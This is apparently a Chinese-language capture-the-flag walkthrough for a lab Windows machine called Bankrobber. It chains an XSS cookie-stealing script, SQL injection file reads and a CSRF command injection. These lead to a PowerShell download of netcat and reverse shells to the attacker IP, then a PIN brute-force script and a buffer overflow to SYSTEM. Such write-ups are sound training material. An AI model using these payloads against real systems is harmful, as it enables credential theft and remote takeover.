基本信息

端口扫描

80,443,445,3306:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$ nmap -sC -sV 10.10.10.154
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 13:21 CST
Nmap scan report for 10.10.10.154
Host is up (0.068s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp open ssl/http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-29T06:23:01
|_ start_date: 2020-12-29T06:06:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.34 seconds

80/443

一个比特币交易所:

Web

随意注册账号登录,有初始余额,可以转账操作,测试转账会提示Admin会查看审核:

XSS

因为提示管理员会查看,那就在comment那里尝试XSS,确认存在,并且可以发现admin路径,cookie中就是用户名密码的base64,那就直接xss打管理员cookie(XSS bot很不稳定,如果收不到请求就注销重新登录重试):

1
<script src="http://10.10.14.15:7777/cookie.js"></script>

打到管理员cookie,解码得到admin密码:

1
2
3
username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1

admin : Hopelessromantic

admin

然后登录admin账号,现在我们是admin:

admin顶部有一些链接,查看内容

notes.txt

notes提示这是xampp,现在还是默认目录;对localhost没有编码

1
2
3
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

backdoorchecker

页面还有个backdoorchecker功能,提示只能使用dir,输入dir后提示只能localhost请求:

1
2
3
var request = new XMLHttpRequest();
request.open('GET', 'http://10.10.14.15:7777/?cookies='+document.cookie, true);
request.send();

SQL注入

admin页面还有个用户搜索功能,很基础的sql注入:

判断列数,3列,直接回显1,2:

load_file

mysql有load_file可以读文件,结合前面的信息xampp默认路径,可以去读源码(这里已经可以直接去读user.txt了):

1
1'union+select+1,load_file('c:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3;--+-

根据代码逻辑,我们可以通过XSS构造admin localhost的请求,使其执行任意命令

backdoorchecker.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad = array('$(','&');
$good = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
$good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
if(isset($_POST['cmd'])){
// FILTER ESCAPE CHARS
foreach($bad as $char){
if(strpos($_POST['cmd'],$char) !== false){
die("You're not allowed to do that.");
}
}
// CHECK IF THE FIRST 2 CHARS ARE LS
if(substr($_POST['cmd'], 0,strlen($good)) != $good){
die("It's only allowed to use the $good command");
}

if($_SERVER['REMOTE_ADDR'] == "::1"){
system($_POST['cmd']);
} else{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}
}
} else{
echo "You are not allowed to use this function!";
}
?>

XSS + XSRF = Shell

然后就是修改xss代码,让管理员执行命令,reverse shell:

shell.js

1
2
3
4
5
var request = new XMLHttpRequest();
var params = 'cmd=dir|powershell -c "iwr -uri 10.10.14.15:7777/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.15 4445';
request.open('POST', 'http://localhost/admin/backdoorchecker.php', true);
request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
request.send(params);

user flag

然后直接用户桌面得到user.txt:

提权信息

C盘根目录有个bankv2.exe,当前用户没有权限:

查看端口和进程发现bankv2.exe运行在本地的910端口,可以把端口转发出来:

1
2
3
4
5
6
# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 8000 --reverse

# target
powershell -c "wget 10.10.14.15:7777/chisel.exe -o c.exe"
c.exe client 10.10.14.15:8000 R:910:localhost:910

然后测试连接本机910端口,提示需要4位pin码:

netstat -ano | findstr LISTENING

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
netstat -ano | findstr LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 3364
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 732
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 3364
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:910 0.0.0.0:0 LISTENING 1572
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 3388
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 444
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 892
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 876
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1340
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 576
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 584
TCP 10.10.10.154:139 0.0.0.0:0 LISTENING 4
TCP [::]:80 [::]:0 LISTENING 3364
TCP [::]:135 [::]:0 LISTENING 732
TCP [::]:443 [::]:0 LISTENING 3364
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3306 [::]:0 LISTENING 3388
TCP [::]:49664 [::]:0 LISTENING 444
TCP [::]:49665 [::]:0 LISTENING 892
TCP [::]:49666 [::]:0 LISTENING 876
TCP [::]:49667 [::]:0 LISTENING 1340
TCP [::]:49668 [::]:0 LISTENING 576
TCP [::]:49669 [::]:0 LISTENING 584

tasklist

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
tasklist

Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 4 K
System 4 0 140 K
smss.exe 288 0 1.188 K
csrss.exe 360 0 8.324 K
wininit.exe 444 0 5.296 K
csrss.exe 452 1 4.140 K
winlogon.exe 520 1 13.744 K
services.exe 576 0 7.696 K
lsass.exe 584 0 13.052 K
svchost.exe 668 0 14.652 K
svchost.exe 732 0 9.084 K
dwm.exe 824 1 30.176 K
svchost.exe 876 0 50.968 K
svchost.exe 892 0 16.632 K
svchost.exe 904 0 24.436 K
svchost.exe 936 0 16.752 K
svchost.exe 392 0 16.804 K
svchost.exe 1052 0 16.520 K
svchost.exe 1100 0 7.928 K
svchost.exe 1196 0 7.124 K
spoolsv.exe 1340 0 15.596 K
bankv2.exe 1572 0 80 K
svchost.exe 1624 0 20.816 K
svchost.exe 1652 0 10.156 K
vmtoolsd.exe 1780 0 23.688 K
VGAuthService.exe 1788 0 13.024 K
Memory Compression 1904 0 34.376 K
xampp-control.exe 2224 0 2.912 K
WmiPrvSE.exe 2364 0 19.144 K
dllhost.exe 2436 0 13.020 K
msdtc.exe 2612 0 10.180 K
LogonUI.exe 2780 1 49.004 K
SearchIndexer.exe 2864 0 18.632 K
conhost.exe 2276 0 560 K
httpd.exe 3364 0 36 K
conhost.exe 3372 0 48 K
mysqld.exe 3388 0 14.748 K
conhost.exe 3400 0 112 K
httpd.exe 3724 0 6.868 K
svchost.exe 3544 0 7.076 K
sedsvc.exe 2788 0 8.488 K
svchost.exe 3688 0 8.296 K
cmd.exe 1692 0 2.772 K
conhost.exe 1504 0 4.188 K
powershell.exe 3012 0 6.784 K
n.exe 2420 0 3.936 K
cmd.exe 4236 0 3.116 K
SearchProtocolHost.exe 1524 0 10.764 K
SearchFilterHost.exe 1292 0 6.336 K
tasklist.exe 4424 0 7.784 K

bankv2

首先脚本爆破出来pin码是0021:

使用正确的pin码测试功能:

overflow

如果输入长字符串,会发现覆盖了内部调用的程序,基础的溢出:

那就是常规的确认偏移,构造payload:

1
2
3
4
➜  ~ msf-pattern_create -l 40
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A
➜ ~ msf-pattern_offset -q 0Ab1
[*] Exact match at offset 32

exploit

就直接修改为使用我们前面传的nc反弹shell,system权限:

1
2
python -c 'print "A"*32 + "\\Users\\Cortin\\AppData\\Local\\Temp\\n.exe -e cmd.exe 10.10.14.15 4446"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\Users\Cortin\AppData\Local\Temp\n.exe -e cmd.exe 10.10.14.15 4446

brute.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/env python3

import socket
import sys


for i in range(10000):
sys.stdout.write(f"\rTrying: {i:04d}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 910))
s.recv(4096)
s.send(f"{i:04d}\n".encode())
resp = s.recv(4096)
if not b"Access denied" in resp:
print(f"\rFound pin: {i:04d}")
break
s.close()

root flag

之后就直接在admin桌面得到root.txt:

参考资料